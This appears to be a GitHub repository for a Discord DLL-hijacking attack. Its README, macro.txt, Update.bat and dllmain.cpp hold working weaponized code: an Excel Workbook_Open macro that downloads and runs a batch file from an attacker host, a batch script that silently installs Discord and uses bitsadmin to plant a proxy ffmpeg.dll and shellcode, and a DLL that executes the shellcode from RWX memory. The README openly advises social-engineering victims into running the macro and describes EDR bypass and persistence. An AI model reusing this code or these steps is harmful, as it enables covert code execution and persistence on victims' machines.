├── LICENSE
├── README.md
├── Update.bat
├── dllmain.cpp
├── ffmpeg.dll
├── macro.txt
└── pop.bin
/LICENSE:
--------------------------------------------------------------------------------
1 | Creative Commons Legal Code
2 |
3 | CC0 1.0 Universal
4 |
5 | CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
6 | LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
7 | ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
8 | INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
9 | REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
10 | PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
11 | THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
12 | HEREUNDER.
13 |
14 | Statement of Purpose
15 |
16 | The laws of most jurisdictions throughout the world automatically confer
17 | exclusive Copyright and Related Rights (defined below) upon the creator
18 | and subsequent owner(s) (each and all, an "owner") of an original work of
19 | authorship and/or a database (each, a "Work").
20 |
21 | Certain owners wish to permanently relinquish those rights to a Work for
22 | the purpose of contributing to a commons of creative, cultural and
23 | scientific works ("Commons") that the public can reliably and without fear
24 | of later claims of infringement build upon, modify, incorporate in other
25 | works, reuse and redistribute as freely as possible in any form whatsoever
26 | and for any purposes, including without limitation commercial purposes.
27 | These owners may contribute to the Commons to promote the ideal of a free
28 | culture and the further production of creative, cultural and scientific
29 | works, or to gain reputation or greater distribution for their Work in
30 | part through the use and efforts of others.
31 |
32 | For these and/or other purposes and motivations, and without any
33 | expectation of additional consideration or compensation, the person
34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she
35 | is an owner of Copyright and Related Rights in the Work, voluntarily
36 | elects to apply CC0 to the Work and publicly distribute the Work under its
37 | terms, with knowledge of his or her Copyright and Related Rights in the
38 | Work and the meaning and intended legal effect of CC0 on those rights.
39 |
40 | 1. Copyright and Related Rights. A Work made available under CC0 may be
41 | protected by copyright and related or neighboring rights ("Copyright and
42 | Related Rights"). Copyright and Related Rights include, but are not
43 | limited to, the following:
44 |
45 | i. the right to reproduce, adapt, distribute, perform, display,
46 | communicate, and translate a Work;
47 | ii. moral rights retained by the original author(s) and/or performer(s);
48 | iii. publicity and privacy rights pertaining to a person's image or
49 | likeness depicted in a Work;
50 | iv. rights protecting against unfair competition in regards to a Work,
51 | subject to the limitations in paragraph 4(a), below;
52 | v. rights protecting the extraction, dissemination, use and reuse of data
53 | in a Work;
54 | vi. database rights (such as those arising under Directive 96/9/EC of the
55 | European Parliament and of the Council of 11 March 1996 on the legal
56 | protection of databases, and under any national implementation
57 | thereof, including any amended or successor version of such
58 | directive); and
59 | vii. other similar, equivalent or corresponding rights throughout the
60 | world based on applicable law or treaty, and any national
61 | implementations thereof.
62 |
63 | 2. Waiver. To the greatest extent permitted by, but not in contravention
64 | of, applicable law, Affirmer hereby overtly, fully, permanently,
65 | irrevocably and unconditionally waives, abandons, and surrenders all of
66 | Affirmer's Copyright and Related Rights and associated claims and causes
67 | of action, whether now known or unknown (including existing as well as
68 | future claims and causes of action), in the Work (i) in all territories
69 | worldwide, (ii) for the maximum duration provided by applicable law or
70 | treaty (including future time extensions), (iii) in any current or future
71 | medium and for any number of copies, and (iv) for any purpose whatsoever,
72 | including without limitation commercial, advertising or promotional
73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
74 | member of the public at large and to the detriment of Affirmer's heirs and
75 | successors, fully intending that such Waiver shall not be subject to
76 | revocation, rescission, cancellation, termination, or any other legal or
77 | equitable action to disrupt the quiet enjoyment of the Work by the public
78 | as contemplated by Affirmer's express Statement of Purpose.
79 |
80 | 3. Public License Fallback. Should any part of the Waiver for any reason
81 | be judged legally invalid or ineffective under applicable law, then the
82 | Waiver shall be preserved to the maximum extent permitted taking into
83 | account Affirmer's express Statement of Purpose. In addition, to the
84 | extent the Waiver is so judged Affirmer hereby grants to each affected
85 | person a royalty-free, non transferable, non sublicensable, non exclusive,
86 | irrevocable and unconditional license to exercise Affirmer's Copyright and
87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the
88 | maximum duration provided by applicable law or treaty (including future
89 | time extensions), (iii) in any current or future medium and for any number
90 | of copies, and (iv) for any purpose whatsoever, including without
91 | limitation commercial, advertising or promotional purposes (the
92 | "License"). The License shall be deemed effective as of the date CC0 was
93 | applied by Affirmer to the Work. Should any part of the License for any
94 | reason be judged legally invalid or ineffective under applicable law, such
95 | partial invalidity or ineffectiveness shall not invalidate the remainder
96 | of the License, and in such case Affirmer hereby affirms that he or she
97 | will not (i) exercise any of his or her remaining Copyright and Related
98 | Rights in the Work or (ii) assert any associated claims and causes of
99 | action with respect to the Work, in either case contrary to Affirmer's
100 | express Statement of Purpose.
101 |
102 | 4. Limitations and Disclaimers.
103 |
104 | a. No trademark or patent rights held by Affirmer are waived, abandoned,
105 | surrendered, licensed or otherwise affected by this document.
106 | b. Affirmer offers the Work as-is and makes no representations or
107 | warranties of any kind concerning the Work, express, implied,
108 | statutory or otherwise, including without limitation warranties of
109 | title, merchantability, fitness for a particular purpose, non
110 | infringement, or the absence of latent or other defects, accuracy, or
111 | the present or absence of errors, whether or not discoverable, all to
112 | the greatest extent permissible under applicable law.
113 | c. Affirmer disclaims responsibility for clearing rights of other persons
114 | that may apply to the Work or any use thereof, including without
115 | limitation any person's Copyright and Related Rights in the Work.
116 | Further, Affirmer disclaims responsibility for obtaining any necessary
117 | consents, permissions or other rights required for any use of the
118 | Work.
119 | d. Affirmer understands and acknowledges that Creative Commons is not a
120 | party to this document and has no duty or obligation with respect to
121 | this CC0 or use of the Work.
122 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Discord DLL hijacking / Automation via Excel Macros.
2 | This is a simple quick example of DLL hijacking enabling proxy execution for the Discord Binary. This can be beneficial for attackers requiring proxy execution to bypass EDR
3 |
4 | ## Note
5 | I submitted this vuln to discord via their hackerone program. They choose to not recognize DLL hijacking unless it's related to the discord installer binary.
6 | Similarly to chrome: https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#why-arent-physically_local-attacks-in-chromes-threat-model
7 |
8 | I understand this too an extent, but they don't seem to make any attempt to verify these DLL's or load them using best practices as directed by Microsoft:
9 | https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
10 |
11 | This is an upstream vulnerability introduced by their dependencies of Node.
12 |
13 |
14 |
15 |
16 |
17 | ## What is DLL hijacking and why is it useful?
18 |
19 | DLL hijacking has been around a very long time. The severity of these attacks is dependent on a variety of factors, primarily application context.
20 | Microsoft gives a good summary:
21 |
22 | "When an application dynamically loads a dynamic link library (DLL) without specifying a fully qualified path, Windows tries to locate the DLL by searching a well-defined set of directories. If an attacker gains control of one of the directories, they can force the application to load a malicious copy of the DLL instead of the DLL that it was expecting. These attacks are known as “DLL preloading attacks” and are common to all operating systems that support dynamically loading shared DLL libraries. The effect of such attacks could be that an attacker can execute code in the context of the user who is running the application. When the application is being run as Administrator, this could lead to a local elevation of privilege."
23 |
24 | -> Source: https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
25 |
26 | Why should we care?
27 | First off, gaining execution context under a trusted application is useful for proxy execution of malicious payloads. Pending the AV/EDR, payloads can be executed in an'trusted' context. Adversaries can also use this technique for persistence mechanisms.
28 |
29 | Discord in some instances requires Administrator privs when Push-To-Talk is overidden by other Administrative applications. This combined with it's popularity peaked my interest.
30 |
31 |
32 | ## Analyzing with Procmon
33 |
34 | Doing a basic filter results in ALOT of misconfigurations for search based DLL issues. What interested me was the 'ffmpeg.dll' I noticed elsehwhere in the procmon dump. This appears to be a common DLL used by a variety of applications including whatsapp.
35 |
36 | 
37 |
38 |
39 |
40 |
41 | ## Generate a payload
42 | Generate some shellcode to your liking. My POC: msfvenom -f raw -o pop.bin -p windows/exec cmd="cmd.exe /k whoami" exitfunc=thread --bad-chars '\x00\x20\' --smallest
43 |
44 | ## Generating a malicious DLL
45 |
46 | Using this great repository we can create our own DLL utilizing pragma comments to replicate functions:
47 | https://github.com/Flangvik/SharpDllProxy
48 |
49 | 
50 |
51 |
52 | This will output two files, .c & an DLL 'tmpXYZ.dll'. Simply create a new DLL project in visual studio and replace the source with the output from DLLProxy.
53 | Once you've compiled it, copy your compiled DLL (name it ffmpegdll), the tmpXYZ.dll (loades your shellcode) and your shellcode.bin into "C:\Users\\AppData\Local\Discord\app-1.0.9012\".
54 |
55 | ## Result
56 | 
57 |
58 | Running Discord.exe executes a shellode. Great! Interestingly Discord itself crashes out with no visual artifacts but our cmd.exe process remains. This is ideal if we drop discord ourselves as a persistence mechanism without user knowledge.
59 |
60 |
61 | ## Weaponizing
62 | It's quite simple to weaponize this DLL hijacking in an automated fashion. Below is a basic macro that downloads a batch file to execute installing discord and download the malicious files.
63 |
64 | The kicker for this method:
65 | - Discord installs silently, no on screen artifacts.
66 | - Discord uses it's own scheduled task on reboot giving us code exec.
67 | - Using ffmpeg.dll will give us code execution and crash the legitimate discord process with zero notification to the user. Likely to see WerFault & MiniDumps however.
68 |
69 |
70 |
71 |
72 | ### Excel Macro
73 |
74 | ```
75 | Private Sub Workbook_Open()
76 |
77 | Dim url, downloadPath, batPath, shell, winHttpReq
78 | url = "http://192.168.120.128/Update.txt"
79 | downloadPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local\Update.bat"
80 | batPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local"
81 |
82 | ' Create a WinHttpRequest objects
83 | Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
84 |
85 | ' Open a connection to the specified URL
86 | winHttpReq.Open "GET", url, False
87 |
88 | ' Send the HTTP request and download the file
89 | winHttpReq.Send
90 | If winHttpReq.Status = 200 Then
91 | Dim stream
92 | Set stream = CreateObject("ADODB.Stream")
93 | stream.Type = 1 ' Binary
94 | stream.Open
95 | stream.Write winHttpReq.ResponseBody
96 | stream.SaveToFile downloadPath, 2 ' Overwrite
97 | stream.Close
98 | End If
99 |
100 | ' Execute the downloaded BAT file
101 | Set shell = CreateObject("WScript.Shell")
102 | shell.Run batPath & "\Update.bat"
103 |
104 | Set shell = Nothing
105 | Set winHttpReq = Nothing
106 |
107 |
108 | End Sub
109 | ```
110 |
111 | ### Seemless discord install via .bat file.
112 | ```
113 | @echo off
114 | set DOWNLOAD_URL=https://dl.discordapp.net/distro/app/stable/win/x86/1.0.9012/DiscordSetup.exe
115 | set DOWNLOAD_DLL=http://192.168.120.128/ffmpeg.dll
116 | set DOWNLOAD_BIN=http://192.168.120.128/pop.bin
117 | set DOWNLOAD_tmp=http://192.168.120.128/tmp108E.dll
118 | set DOWNLOAD_LOCATION=C:\Windows\Temp\Update.exe
119 | set EXECUTE_LOCATION=C:\Windows\Temp\
120 |
121 | set COPY_LOCATION=%LOCALAPPDATA%\Discord\app-1.0.9012\
122 | set DL_DLL=%LOCALAPPDATA%\Discord\app-1.0.9012\ffmpeg.dll
123 | set DL_tmp=%LOCALAPPDATA%\Discord\app-1.0.9012\tmp108E.dll
124 | set DL_bin=%LOCALAPPDATA%\Discord\app-1.0.9012\pop.bin
125 |
126 |
127 | bitsadmin /transfer myDownloadJob /priority normal %DOWNLOAD_URL% %DOWNLOAD_LOCATION%
128 | start "" "%EXECUTE_LOCATION%\Update.exe" --silent
129 | timeout /t 10
130 | bitsadmin /transfer myDownloadJob1 /priority normal %DOWNLOAD_DLL% %DL_DLL%
131 | bitsadmin /transfer myDownloadJob2 /priority normal %DOWNLOAD_BIN% %DL_bin%
132 | bitsadmin /transfer myDownloadJob3 /priority normal %DOWNLOAD_tmp% %DL_tmp%
133 | ```
134 |
135 | ### Server setup
136 | Enable apache 2 and copy across the files from below (I forgot the bat file in the ss).
137 | 
138 |
139 | Create your macro in a convincing manner, get them to execute it.
140 |
141 | ### Result...
142 | Popped a shell .. :)
143 |
144 | 
145 |
146 |
147 |
148 |
149 |
--------------------------------------------------------------------------------
/Update.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | set DOWNLOAD_URL=https://dl.discordapp.net/distro/app/stable/win/x86/1.0.9012/DiscordSetup.exe
3 | set DOWNLOAD_DLL=http://192.168.120.128/ffmpeg.dll
4 | set DOWNLOAD_BIN=http://192.168.120.128/pop.bin
5 | set DOWNLOAD_tmp=http://192.168.120.128/tmp108E.dll
6 | set DOWNLOAD_LOCATION=C:\Windows\Temp\Update.exe
7 | set EXECUTE_LOCATION=C:\Windows\Temp\
8 |
9 | set COPY_LOCATION=%LOCALAPPDATA%\Discord\app-1.0.9012\
10 | set DL_DLL=%LOCALAPPDATA%\Discord\app-1.0.9012\ffmpeg.dll
11 | set DL_tmp=%LOCALAPPDATA%\Discord\app-1.0.9012\tmp108E.dll
12 | set DL_bin=%LOCALAPPDATA%\Discord\app-1.0.9012\pop.bin
13 |
14 |
15 | bitsadmin /transfer myDownloadJob /priority normal %DOWNLOAD_URL% %DOWNLOAD_LOCATION%
16 | start "" "%EXECUTE_LOCATION%\Update.exe" --silent
17 | timeout /t 10
18 | bitsadmin /transfer myDownloadJob1 /priority normal %DOWNLOAD_DLL% %DL_DLL%
19 | bitsadmin /transfer myDownloadJob2 /priority normal %DOWNLOAD_BIN% %DL_bin%
20 | bitsadmin /transfer myDownloadJob3 /priority normal %DOWNLOAD_tmp% %DL_tmp%
21 |
22 |
--------------------------------------------------------------------------------
/dllmain.cpp:
--------------------------------------------------------------------------------
1 |
2 | #include "pch.h"
3 | #include
4 | #include
5 |
6 | #define _CRT_SECURE_NO_DEPRECATE
7 | #pragma warning (disable : 4996)
8 |
9 | #pragma comment(linker, "/export:av_buffer_create=tmp108E.av_buffer_create,@1")
10 | #pragma comment(linker, "/export:av_buffer_get_opaque=tmp108E.av_buffer_get_opaque,@2")
11 | #pragma comment(linker, "/export:av_dict_count=tmp108E.av_dict_count,@3")
12 | #pragma comment(linker, "/export:av_dict_free=tmp108E.av_dict_free,@4")
13 | #pragma comment(linker, "/export:av_dict_get=tmp108E.av_dict_get,@5")
14 | #pragma comment(linker, "/export:av_dict_set=tmp108E.av_dict_set,@6")
15 | #pragma comment(linker, "/export:av_force_cpu_flags=tmp108E.av_force_cpu_flags,@7")
16 | #pragma comment(linker, "/export:av_frame_alloc=tmp108E.av_frame_alloc,@8")
17 | #pragma comment(linker, "/export:av_frame_clone=tmp108E.av_frame_clone,@9")
18 | #pragma comment(linker, "/export:av_frame_free=tmp108E.av_frame_free,@10")
19 | #pragma comment(linker, "/export:av_frame_unref=tmp108E.av_frame_unref,@11")
20 | #pragma comment(linker, "/export:av_free=tmp108E.av_free,@12")
21 | #pragma comment(linker, "/export:av_get_bytes_per_sample=tmp108E.av_get_bytes_per_sample,@13")
22 | #pragma comment(linker, "/export:av_get_cpu_flags=tmp108E.av_get_cpu_flags,@14")
23 | #pragma comment(linker, "/export:av_image_check_size=tmp108E.av_image_check_size,@15")
24 | #pragma comment(linker, "/export:av_init_packet=tmp108E.av_init_packet,@16")
25 | #pragma comment(linker, "/export:av_log_set_level=tmp108E.av_log_set_level,@17")
26 | #pragma comment(linker, "/export:av_malloc=tmp108E.av_malloc,@18")
27 | #pragma comment(linker, "/export:av_max_alloc=tmp108E.av_max_alloc,@19")
28 | #pragma comment(linker, "/export:av_new_packet=tmp108E.av_new_packet,@20")
29 | #pragma comment(linker, "/export:av_packet_alloc=tmp108E.av_packet_alloc,@21")
30 | #pragma comment(linker, "/export:av_packet_copy_props=tmp108E.av_packet_copy_props,@22")
31 | #pragma comment(linker, "/export:av_packet_free=tmp108E.av_packet_free,@23")
32 | #pragma comment(linker, "/export:av_packet_get_side_data=tmp108E.av_packet_get_side_data,@24")
33 | #pragma comment(linker, "/export:av_packet_unref=tmp108E.av_packet_unref,@25")
34 | #pragma comment(linker, "/export:av_rdft_calc=tmp108E.av_rdft_calc,@26")
35 | #pragma comment(linker, "/export:av_rdft_end=tmp108E.av_rdft_end,@27")
36 | #pragma comment(linker, "/export:av_rdft_init=tmp108E.av_rdft_init,@28")
37 | #pragma comment(linker, "/export:av_read_frame=tmp108E.av_read_frame,@29")
38 | #pragma comment(linker, "/export:av_rescale_q=tmp108E.av_rescale_q,@30")
39 | #pragma comment(linker, "/export:av_samples_get_buffer_size=tmp108E.av_samples_get_buffer_size,@31")
40 | #pragma comment(linker, "/export:av_seek_frame=tmp108E.av_seek_frame,@32")
41 | #pragma comment(linker, "/export:av_stream_get_first_dts=tmp108E.av_stream_get_first_dts,@33")
42 | #pragma comment(linker, "/export:av_stream_get_side_data=tmp108E.av_stream_get_side_data,@34")
43 | #pragma comment(linker, "/export:av_strerror=tmp108E.av_strerror,@35")
44 | #pragma comment(linker, "/export:avcodec_align_dimensions=tmp108E.avcodec_align_dimensions,@36")
45 | #pragma comment(linker, "/export:avcodec_alloc_context3=tmp108E.avcodec_alloc_context3,@37")
46 | #pragma comment(linker, "/export:avcodec_descriptor_get=tmp108E.avcodec_descriptor_get,@38")
47 | #pragma comment(linker, "/export:avcodec_descriptor_next=tmp108E.avcodec_descriptor_next,@39")
48 | #pragma comment(linker, "/export:avcodec_find_decoder=tmp108E.avcodec_find_decoder,@40")
49 | #pragma comment(linker, "/export:avcodec_flush_buffers=tmp108E.avcodec_flush_buffers,@41")
50 | #pragma comment(linker, "/export:avcodec_free_context=tmp108E.avcodec_free_context,@42")
51 | #pragma comment(linker, "/export:avcodec_get_name=tmp108E.avcodec_get_name,@43")
52 | #pragma comment(linker, "/export:avcodec_open2=tmp108E.avcodec_open2,@44")
53 | #pragma comment(linker, "/export:avcodec_parameters_to_context=tmp108E.avcodec_parameters_to_context,@45")
54 | #pragma comment(linker, "/export:avcodec_receive_frame=tmp108E.avcodec_receive_frame,@46")
55 | #pragma comment(linker, "/export:avcodec_send_packet=tmp108E.avcodec_send_packet,@47")
56 | #pragma comment(linker, "/export:avformat_alloc_context=tmp108E.avformat_alloc_context,@48")
57 | #pragma comment(linker, "/export:avformat_close_input=tmp108E.avformat_close_input,@49")
58 | #pragma comment(linker, "/export:avformat_find_stream_info=tmp108E.avformat_find_stream_info,@50")
59 | #pragma comment(linker, "/export:avformat_free_context=tmp108E.avformat_free_context,@51")
60 | #pragma comment(linker, "/export:avformat_open_input=tmp108E.avformat_open_input,@52")
61 | #pragma comment(linker, "/export:avio_alloc_context=tmp108E.avio_alloc_context,@53")
62 | #pragma comment(linker, "/export:avio_close=tmp108E.avio_close,@54")
63 |
64 |
65 | DWORD WINAPI DoMagic(LPVOID lpParameter)
66 | {
67 | //https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
68 | FILE* fp;
69 | size_t size;
70 | unsigned char* buffer;
71 |
72 | fp = fopen("pop.bin", "rb");
73 | fseek(fp, 0, SEEK_END);
74 | size = ftell(fp);
75 | fseek(fp, 0, SEEK_SET);
76 | buffer = (unsigned char*)malloc(size);
77 |
78 | //https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
79 | fread(buffer, size, 1, fp);
80 |
81 | void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
82 |
83 | memcpy(exec, buffer, size);
84 |
85 | ((void(*) ())exec)();
86 |
87 | return 0;
88 | }
89 |
90 | BOOL APIENTRY DllMain(HMODULE hModule,
91 | DWORD ul_reason_for_call,
92 | LPVOID lpReserved
93 | )
94 | {
95 | HANDLE threadHandle;
96 |
97 | switch (ul_reason_for_call)
98 | {
99 | case DLL_PROCESS_ATTACH:
100 | // https://gist.github.com/securitytube/c956348435cc90b8e1f7
101 | // Create a thread and close the handle as we do not want to use it to wait for it
102 | threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
103 | CloseHandle(threadHandle);
104 |
105 | case DLL_THREAD_ATTACH:
106 | break;
107 | case DLL_THREAD_DETACH:
108 | break;
109 | case DLL_PROCESS_DETACH:
110 | break;
111 | }
112 | return TRUE;
113 | }
114 |
115 |
116 |
117 |
--------------------------------------------------------------------------------
/ffmpeg.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nullsection/Discord-DLL-Hijacking/69619e3a24be18055a0608f38ca43a8894b3d895/ffmpeg.dll
--------------------------------------------------------------------------------
/macro.txt:
--------------------------------------------------------------------------------
1 | Private Sub Workbook_Open()
2 |
3 | Dim url, downloadPath, batPath, shell, winHttpReq
4 | url = "http://192.168.120.128/Update.txt"
5 | downloadPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local\Update.bat"
6 | batPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local"
7 |
8 | ' Create a WinHttpRequest objects
9 | Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
10 |
11 | ' Open a connection to the specified URL
12 | winHttpReq.Open "GET", url, False
13 |
14 | ' Send the HTTP request and download the file
15 | winHttpReq.Send
16 | If winHttpReq.Status = 200 Then
17 | Dim stream
18 | Set stream = CreateObject("ADODB.Stream")
19 | stream.Type = 1 ' Binary
20 | stream.Open
21 | stream.Write winHttpReq.ResponseBody
22 | stream.SaveToFile downloadPath, 2 ' Overwrite
23 | stream.Close
24 | End If
25 |
26 | ' Execute the downloaded BAT file
27 | Set shell = CreateObject("WScript.Shell")
28 | shell.Run batPath & "\Update.bat"
29 |
30 | Set shell = Nothing
31 | Set winHttpReq = Nothing
32 |
33 |
34 | End Sub
--------------------------------------------------------------------------------
/pop.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nullsection/Discord-DLL-Hijacking/69619e3a24be18055a0608f38ca43a8894b3d895/pop.bin
--------------------------------------------------------------------------------